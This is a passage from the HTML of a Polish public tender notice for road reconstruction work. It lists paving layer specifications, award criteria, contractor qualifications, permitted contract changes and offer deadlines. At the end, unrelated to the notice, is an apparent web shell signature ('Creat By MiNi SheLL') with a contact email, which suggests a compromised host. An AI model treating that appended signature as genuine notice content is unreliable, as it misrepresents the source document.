na odcinku 99,7 m;<br/>	wykonanie górnej warstwy podbudowy z kruszywa o grubości 10 cm i szerokości 5,3 m na odcinku 99,7 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 3 cm na odcinku 486,5 m oraz 4 cm na odcinku 99,7 m i szerokości 5,1 m,<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 5,0 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 19 – Przebudowa drogi nr 107414L w Koźle.<br/>Odcinek drogi o długości 1 725,0 m:<br/>	wykonanie warstwy wyrównawczo-wiążącej z betonu asfaltowego o grubości 3 cm i szerokości 5,1 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm o szerokości 5,0 m;<br/>	wykonanie poboczy z kruszywa o grubości 8 cm i szerokości 0,75 m.<br/>Zadanie 20 – Przebudowa drogi nr 112894L w Woli Czołnowskiej.<br/>Odcinek drogi o długości 385 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie podbudowy wyrównawczo-wzmacniającej z kruszywa o średniej grubości 15 cm i szerokości 3,8 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 5 cm i szerokości 3,5 m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający określił następujące kryteria oceny ofert przypisując im<br/>odpowiednią wagę punktową: cena - 60%; okres gwarancji - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną, polegającą na budowie lub przebudowie drogi o wartości min. 3 000 000,00 zł brutto.<br/>Warunek zostanie oceniony na podstawie wykazu robót budowlanych (załącznik nr 5 do SWZ) polegających na budowie, przebudowie lub remoncie oświetlenia drogowego wykonanej, nie wcześniej niż okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r., poz. 275, ze zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone <br/>do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	UWAGA: Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 8 do SWZ.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we projekcie Umowy, tj.:<br/>1) termin wykonania może ulec przesunięciu w przypadku opóźnień wynikających z:<br/>a) przestojów (opóźnień) zależnych od Zamawiającego,<br/>b) wystąpienie warunków atmosferycznych uniemożliwiających wykonywanie robót – wpis w dzienniku budowy,<br/>c) poleceń inspektora nadzoru mających wpływ na termin wykonania, lecz nie wynikających z uchybień Wykonawcy,<br/>d) wykopalisk uniemożliwiających prowadzenie robót,<br/>e) wystąpienia istotnego błędu w dokumentacji projektowej lub istotnych zmian projektowych wynikających z przyczyn niezależnych od Zamawiającego,<br/>f) konieczności uzyskania decyzji, uzgodnień i/lub opinii mogących spowodować wstrzymanie robót z przyczyn niezależnych od Wykonawcy<br/>g) w przypadku wystąpienia okoliczności niezależnych od Wykonawcy, skutkujących niemożnością dotrzymania terminu realizacji zamówienia. Do okoliczności, o których mowa w zdaniu powyżej, zaliczyć należy w szczególności przypadek wystąpienia siły wyższej.<br/>2) w uzasadnionych przypadkach, w ramach przedmiotowego zamówienia, dopuszcza się, za zgodą Zamawiającego, możliwość wykonania robót budowlanych w inny sposób niż określono to w dokumentacji projektowej. Przedmiotowe zmiany muszą być korzystne dla Zamawiającego i nie mogą prowadzić do zwiększenia wynagrodzenia Wykonawcy. Zmiana sposobu wykonania robót może nastąpić w szczególności na skutek zmian<br/>technologicznych spowodowanych na przykład następującymi okolicznościami:<br/>a) niedostępność pojawienie się na na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej,<br/>b) rynku materiałów lub urządzeń nowszej generacji,<br/>c) pojawienie się nowszej technologii wykonania zaprojektowanych robót,<br/>d) konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych czy technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,<br/>e) stały się konieczne na skutek ujawnienia przeszkód w gruncie lub błędów w dokumentacji projektowej,<br/>f) pozwolą osiągnąć obniżenie kosztów eksploatacji, lepsze parametry techniczne, użytkowe, estetyczne od przyjętych w dokumentacji projektowej,<br/>g) są korzystne dla Zamawiającego na etapie realizacji umowy i przyniosą korzystne skutki w trakcie eksploatacji przedmiotu zamówienia,<br/>h) wykonanie tych robót będzie niezbędne do prawidłowego wykonania przedmiotu umowy.<br/>3) Zamawiający przewiduje dokonanie zmian w umowie wynikających z:<br/>a) przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji lub inne podmioty niezbędnych do realizacji zamówienia decyzji,<br/>b) wydania postanowienia o wstrzymaniu robót budowlanych w przypadku, o którym mowa w art. 50 ust. 1 pkt 4 Prawa budowlanego,c) konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu, którego nie przewidywano przy zawieraniu umowy,<br/>d) konieczności zaspokojenia roszczeń lub oczekiwań osób trzecich – w tym grup społecznych lub zawodowych niemożliwych do jednoznacznego określenia w chwili zawierania umowy,<br/>e) kolizji z planowanymi lub równolegle prowadzonymi przez Zamawiającego lub inne podmioty inwestycjami.<br/>4) możliwość zmiany kierownika budowy/robót, przy czym osoby zastępujące muszą posiadać odpowiednie uprawnienia,<br/>6) gdy Wykonawca w ofercie nie przewidział korzystania z podwykonawców, przewiduje się możliwą zmianę umowy dotyczącą powierzenia przez Wykonawcę wykonywania części zamówienia podwykonawcom,<br/>7) w przypadku, gdy Wykonawca w ofercie przewidział korzystanie z podwykonawców, przewiduje się możliwą zmianę umowy dotyczącą samodzielnego wykonania przedmiotu zamówienia lub zwiększenia bądź zmniejszenia liczby podwykonawców,<br/>8) możliwość zmiany wysokości wynagrodzenia w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją przedmiotu zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-50fd544a-afc9-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-10 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com